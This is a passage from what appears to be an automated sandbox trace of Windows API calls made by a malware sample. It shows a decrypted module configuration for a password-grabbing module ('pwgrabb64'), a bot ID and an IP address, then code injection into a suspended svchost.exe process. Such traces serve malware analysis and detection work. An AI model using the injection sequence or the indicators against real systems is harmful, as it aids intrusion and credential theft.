dwFlags=0x0) returned 1 [0176.071] CryptSetKeyParam (hKey=0x332b7dd0, dwParam=0x4, pbData=0xce034*=0x1, dwFlags=0x0) returned 1 [0176.071] CryptSetKeyParam (hKey=0x332b7dd0, dwParam=0x1, pbData=0x32e6cf30, dwFlags=0x0) returned 1 [0176.079] CryptDecrypt (in: hKey=0x332b7dd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32846720, pdwDataLen=0xce01c | out: pbData=0x32846720, pdwDataLen=0xce01c) returned 1 [0176.079] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.079] CryptDestroyKey (hKey=0x332b7dd0) returned 0 [0176.079] GetVersion () returned 0x295a000a [0176.082] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xcdf88, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xcdf88) returned 0x0 [0176.083] BCryptImportKeyPair (in: hAlgorithm=0x332a1a30, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xcdf80, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xcdf80) returned 0x0 [0176.083] BCryptGetProperty (in: hObject=0x337bbe70, pszProperty="SignatureLength", pbOutput=0xcdf7c, cbOutput=0x4, pcbResult=0xcdf9c, dwFlags=0x0 | out: pbOutput=0xcdf7c, pcbResult=0xcdf9c) returned 0x0 [0176.083] BCryptVerifySignature (hKey=0x337bbe70, pPaddingInfo=0x0, pbHash=0x32e41c40, cbHash=0x30, pbSignature=0x329027f0, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0176.084] BCryptDestroyKey (in: hKey=0x337bbe70 | out: hKey=0x337bbe70) returned 0x0 [0176.084] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x332a1a30, dwFlags=0x0 | out: hAlgorithm=0x332a1a30) returned 0x0 [0176.084] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41c40 | out: hHeap=0x2150000) returned 1 [0176.097] lstrlenA (lpString="*") returned 30 [0176.101] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc [0176.101] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9 [0176.102] CharLowerBuffA (in: lpsz="all", cchLength=0x3 | out: lpsz="all") returned 0x3 [0176.102] CharLowerBuffA (in: lpsz="nohead", cchLength=0x6 | out: lpsz="nohead") returned 0x6 [0176.102] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8 [0176.102] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0176.102] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8 [0176.102] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0176.102] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8 [0176.103] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4 [0176.103] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3 [0176.103] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4 [0176.103] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6 [0176.103] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2 [0176.103] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2 [0176.105] GetFullPathNameW (in: lpFileName="EN\\pwgrabb64", nBufferLength=0x105, lpBuffer=0x32e42330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\pwgrabb64", lpFilePart=0x0) returned 0x20 [0176.105] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32945720 | out: hHeap=0x2150000) returned 1 [0176.110] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e42330 | out: hHeap=0x2150000) returned 1 [0176.110] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0176.110] WinHttpCloseHandle (hInternet=0x332c97f0) returned 1 [0176.111] WinHttpCloseHandle (hInternet=0x332be210) returned 1 [0176.111] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e66c70 | out: hHeap=0x2150000) returned 1 [0176.111] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e67600 | out: hHeap=0x2150000) returned 1 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pwgrabb64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49de0 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pwgrabb64", cchWideChar=-1, lpMultiByteStr=0x32e49de0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pwgrabb64", lpUsedDefaultChar=0x0) returned 10 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot153", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49dc0 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot153", cchWideChar=-1, lpMultiByteStr=0x32e49dc0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tot153", lpUsedDefaultChar=0x0) returned 7 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0176.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e412d0 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", cchWideChar=-1, lpMultiByteStr=0x32e412d0, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", lpUsedDefaultChar=0x0) returned 50 [0176.111] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce1b8 | out: lpSystemTimeAsFileTime=0xce1b8*(dwLowDateTime=0xf57c016d, dwHighDateTime=0x1d7b3c9)) [0176.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.153.199.169", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0176.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e20 [0176.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.153.199.169", cchWideChar=-1, lpMultiByteStr=0x32e49e20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="88.153.199.169", lpUsedDefaultChar=0x0) returned 15 [0176.111] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49dc0 | out: hHeap=0x2150000) returned 1 [0176.111] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.111] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e20 | out: hHeap=0x2150000) returned 1 [0176.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0176.112] GetStartupInfoW (in: lpStartupInfo=0xcdd28 | out: lpStartupInfo=0xcdd28*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0176.112] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x800) returned 0x32e64aa0 [0176.112] GetSystemDirectoryW (in: lpBuffer=0x32e64aa0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0176.112] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcdd28*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0xcdd90 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0xcdd90*(hProcess=0x5cc, hThread=0x5c8, dwProcessId=0x148, dwThreadId=0xa30)) returned 1 [0176.128] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64aa0 | out: hHeap=0x2150000) returned 1 [0176.129] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x580 [0176.129] GetCurrentProcess () returned 0xffffffffffffffff [0176.129] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1b4 [0176.129] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5e0 [0176.129] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x580, hTargetProcessHandle=0x5cc, lpTargetHandle=0xcdb10, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdb10*=0x4) returned 1 [0176.129] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x5e0, hTargetProcessHandle=0x5cc, lpTargetHandle=0xcdb18, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdb18*=0x8) returned 1 [0176.129] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x1b4, hTargetProcessHandle=0x5cc, lpTargetHandle=0xcdb20, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdb20*=0xc) returned 1 [0176.129] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x230, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0176.130] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x100000, lpBuffer=0x121a90*, nSize=0x230, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0x121a90*, lpNumberOfBytesWritten=0xcdab8*=0x230) returned 1 [0176.131] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.131] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WaitForSingleObject") returned 0x7ffb2625d840 [0176.131] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0176.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SignalObjectAndWait") returned 0x7ffb2625d070 [0176.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitProcess") returned 0x7ffb26254d80 [0176.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ResetEvent") returned 0x7ffb2625d7e0 [0176.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0176.140] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0176.141] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0176.141] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x40) returned 0x110000 [0176.141] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcdb10*, nSize=0xd8, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0xcdb10*, lpNumberOfBytesWritten=0xcdab8*=0xd8) returned 1 [0176.143] NtQueryInformationProcess (in: ProcessHandle=0x5cc, ProcessInformationClass=0x0, ProcessInformation=0xcd940, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xcd940, ReturnLength=0x0) returned 0x0 [0176.143] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x3a9000, lpBuffer=0xcd920, nSize=0x20, lpNumberOfBytesRead=0xcd8d8 | out: lpBuffer=0xcd920*, lpNumberOfBytesRead=0xcd8d8*=0x20) returned 1 [0176.144] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x7ff6bac60000, lpBuffer=0xcd970, nSize=0x40, lpNumberOfBytesRead=0xcd8d8 | out: lpBuffer=0xcd970*, lpNumberOfBytesRead=0xcd8d8*=0x40) returned 1 [0176.144] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x7ff6bac600f0, lpBuffer=0xcd9b0, nSize=0x108, lpNumberOfBytesRead=0xcd8d8 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesRead=0xcd8d8*=0x108) returned 1 [0176.144] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x7ff6bac63980, lpBuffer=0xcdd18*, nSize=0x16, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0xcdd18*, lpNumberOfBytesWritten=0xcdab8*=0x16) returned 1 [0176.145] ResetEvent (hEvent=0x580) returned 1 [0176.145] ResetEvent (hEvent=0x5e0) returned 1 [0176.145] ResumeThread (hThread=0x5c8) returned 0x1 [0176.146] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xbc0d0) returned 0x32648720 [0176.229] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x180000000, dwSize=0xc1000, flAllocationType=0x2000, flProtect=0x40) returned 0x180000000 [0176.229] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x180000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x180000000 [0176.230] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.230] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0176.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x326f9b62, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0176.230] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x326f9b62, cbMultiByte=-1, lpWideCharStr=0x32e6c870, cchWideChar=12 | out: lpWideCharStr="VERSION.dll") returned 12 [0176.230] lstrlenW (lpString="VERSION.dll") returned 11 [0176.230] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.231] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x32e6c870*, nSize=0x18, lpNumberOfBytesWritten=0xcd988 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd988*=0x18) returned 1 [0176.232] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0176.233] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8d0 [0176.233] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.233] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c8d0*, nSize=0x18, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0x32e6c8d0*, lpNumberOfBytesWritten=0xcd898*=0x18) returned 1 [0176.235] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8e0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesWritten=0xcd898*=0xd8) returned 1 [0176.237] ResetEvent (hEvent=0x580) returned 1 [0176.237] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.254] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0176.254] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.254] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c8d0 | out: hHeap=0x2150000) returned 1 [0176.254] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.254] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.255] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.255] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.255] lstrlenA (lpString="GetFileVersionInfoA") returned 19 [0176.255] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.255] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9b4e*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9b4e*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0176.257] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.257] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c720 [0176.262] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.262] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c720*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c720*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.264] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.265] ResetEvent (hEvent=0x580) returned 1 [0176.265] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.266] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.266] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.266] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c720 | out: hHeap=0x2150000) returned 1 [0176.266] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.267] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.267] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.267] lstrlenA (lpString="VerQueryValueA") returned 14 [0176.267] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.267] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9b3c*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9b3c*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.269] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.269] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb70 [0176.269] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.269] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cb70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cb70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.270] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.270] ResetEvent (hEvent=0x580) returned 1 [0176.270] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.271] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.271] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.271] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb70 | out: hHeap=0x2150000) returned 1 [0176.271] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.272] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.272] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.272] lstrlenA (lpString="GetFileVersionInfoSizeA") returned 23 [0176.272] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.272] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9b22*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9b22*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0176.274] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.274] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.274] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.275] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.275] ResetEvent (hEvent=0x580) returned 1 [0176.275] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.275] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.275] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.276] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.276] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.276] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.276] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0176.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x326fa0a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0176.276] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x326fa0a8, cbMultiByte=-1, lpWideCharStr=0x32e6c870, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13 [0176.276] lstrlenW (lpString="KERNEL32.dll") returned 12 [0176.276] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.277] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x32e6c870*, nSize=0x1a, lpNumberOfBytesWritten=0xcd988 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd988*=0x1a) returned 1 [0176.278] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0176.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0176.278] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.278] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ce70*, nSize=0x18, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0x32e6ce70*, lpNumberOfBytesWritten=0xcd898*=0x18) returned 1 [0176.278] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8e0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesWritten=0xcd898*=0xd8) returned 1 [0176.279] ResetEvent (hEvent=0x580) returned 1 [0176.279] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, 